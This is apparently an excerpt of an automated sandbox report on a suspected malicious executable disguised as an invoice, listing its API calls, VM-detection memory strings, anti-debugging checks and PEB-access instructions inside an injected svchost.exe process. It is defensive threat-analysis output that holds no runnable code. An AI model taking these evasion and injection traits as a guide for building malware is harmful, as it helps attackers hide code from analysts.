          Source: C:\Windows\SysWOW64\svchost.exe TID: 8116 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1278849229.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285701934.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz/U
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1307392420.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1287789213.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
          Source: AppVClient.exe, 0000000C.00000003.1282030119.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000003.1282293874.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000003.1282377257.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000002.1292625401.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine#
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1307700922.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1314358242.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe API call chain: ExitProcess graph end node graph_0-108899
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe API call chain: ExitProcess graph end node graph_0-109245
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E rdtsc 17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00417D33 LdrLoadDll,17_2_00417D33
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00573594 mov eax, dword ptr fs:[00000030h]0_2_00573594
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B81130 mov eax, dword ptr fs:[00000030h]0_2_00B81130
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC3F3D mov eax, dword ptr fs:[00000030h]0_2_00BC3F3D
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9F170 mov eax, dword ptr fs:[00000030h]0_2_00E9F170
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9F110 mov eax, dword ptr fs:[00000030h]0_2_00E9F110
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9DAB0 mov eax, dword ptr fs:[00000030h]0_2_00E9DAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEC3CD mov eax, dword ptr fs:[00000030h]17_2_03CEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB63C0 mov eax, dword ptr fs:[00000030h]17_2_03CB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov eax, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov eax, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov eax, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD43D4 mov eax, dword ptr fs:[00000030h]17_2_03CD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD43D4 mov eax, dword ptr fs:[00000030h]17_2_03CD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C663FF mov eax, dword ptr fs:[00000030h]17_2_03C663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E388 mov eax, dword ptr fs:[00000030h]17_2_03C2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E388 mov eax, dword ptr fs:[00000030h]17_2_03C2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E388 mov eax, dword ptr fs:[00000030h]17_2_03C2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5438F mov eax, dword ptr fs:[00000030h]17_2_03C5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5438F mov eax, dword ptr fs:[00000030h]17_2_03C5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28397 mov eax, dword ptr fs:[00000030h]17_2_03C28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28397 mov eax, dword ptr fs:[00000030h]17_2_03C28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28397 mov eax, dword ptr fs:[00000030h]17_2_03C28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov ecx, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFA352 mov eax, dword ptr fs:[00000030h]17_2_03CFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD8350 mov ecx, dword ptr fs:[00000030h]17_2_03CD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0634F mov eax, dword ptr fs:[00000030h]17_2_03D0634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD437C mov eax, dword ptr fs:[00000030h]17_2_03CD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A30B mov eax, dword ptr fs:[00000030h]17_2_03C6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A30B mov eax, dword ptr fs:[00000030h]17_2_03C6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A30B mov eax, dword ptr fs:[00000030h]17_2_03C6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C310 mov ecx, dword ptr fs:[00000030h]17_2_03C2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C50310 mov ecx, dword ptr fs:[00000030h]17_2_03C50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov eax, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov ecx, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov eax, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov eax, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D062D6 mov eax, dword ptr fs:[00000030h]17_2_03D062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402E1 mov eax, dword ptr fs:[00000030h]17_2_03C402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402E1 mov eax, dword ptr fs:[00000030h]17_2_03C402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402E1 mov eax, dword ptr fs:[00000030h]17_2_03C402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E284 mov eax, dword ptr fs:[00000030h]17_2_03C6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E284 mov eax, dword ptr fs:[00000030h]17_2_03C6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0283 mov eax, dword ptr fs:[00000030h]17_2_03CB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0283 mov eax, dword ptr fs:[00000030h]17_2_03CB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0283 mov eax, dword ptr fs:[00000030h]17_2_03CB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402A0 mov eax, dword ptr fs:[00000030h]17_2_03C402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402A0 mov eax, dword ptr fs:[00000030h]17_2_03C402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB8243 mov eax, dword ptr fs:[00000030h]17_2_03CB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB8243 mov ecx, dword ptr fs:[00000030h]17_2_03CB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0625D mov eax, dword ptr fs:[00000030h]17_2_03D0625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A250 mov eax, dword ptr fs:[00000030h]17_2_03C2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36259 mov eax, dword ptr fs:[00000030h]17_2_03C36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEA250 mov eax, dword ptr fs:[00000030h]17_2_03CEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEA250 mov eax, dword ptr fs:[00000030h]17_2_03CEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34260 mov eax, dword ptr fs:[00000030h]17_2_03C34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34260 mov eax, dword ptr fs:[00000030h]17_2_03C34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34260 mov eax, dword ptr fs:[00000030h]17_2_03C34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2826B mov eax, dword ptr fs:[00000030h]17_2_03C2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2823B mov eax, dword ptr fs:[00000030h]17_2_03C2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF61C3 mov eax, dword ptr fs:[00000030h]17_2_03CF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF61C3 mov eax, dword ptr fs:[00000030h]17_2_03CF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D061E5 mov eax, dword ptr fs:[00000030h]17_2_03D061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C601F8 mov eax, dword ptr fs:[00000030h]17_2_03C601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C70185 mov eax, dword ptr fs:[00000030h]17_2_03C70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEC188 mov eax, dword ptr fs:[00000030h]17_2_03CEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEC188 mov eax, dword ptr fs:[00000030h]17_2_03CEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4180 mov eax, dword ptr fs:[00000030h]17_2_03CD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4180 mov eax, dword ptr fs:[00000030h]17_2_03CD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A197 mov eax, dword ptr fs:[00000030h]17_2_03C2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A197 mov eax, dword ptr fs:[00000030h]17_2_03C2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A197 mov eax, dword ptr fs:[00000030h]17_2_03C2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov ecx, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C156 mov eax, dword ptr fs:[00000030h]17_2_03C2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC8158 mov eax, dword ptr fs:[00000030h]17_2_03CC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36154 mov eax, dword ptr fs:[00000030h]17_2_03C36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36154 mov eax, dword ptr fs:[00000030h]17_2_03C36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04164 mov eax, dword ptr fs:[00000030h]17_2_03D04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04164 mov eax, dword ptr fs:[00000030h]17_2_03D04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov ecx, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov eax, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov eax, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov eax, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF0115 mov eax, dword ptr fs:[00000030h]17_2_03CF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C60124 mov eax, dword ptr fs:[00000030h]17_2_03C60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB20DE mov eax, dword ptr fs:[00000030h]17_2_03CB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]17_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C380E9 mov eax, dword ptr fs:[00000030h] | 17_2_03C380E9
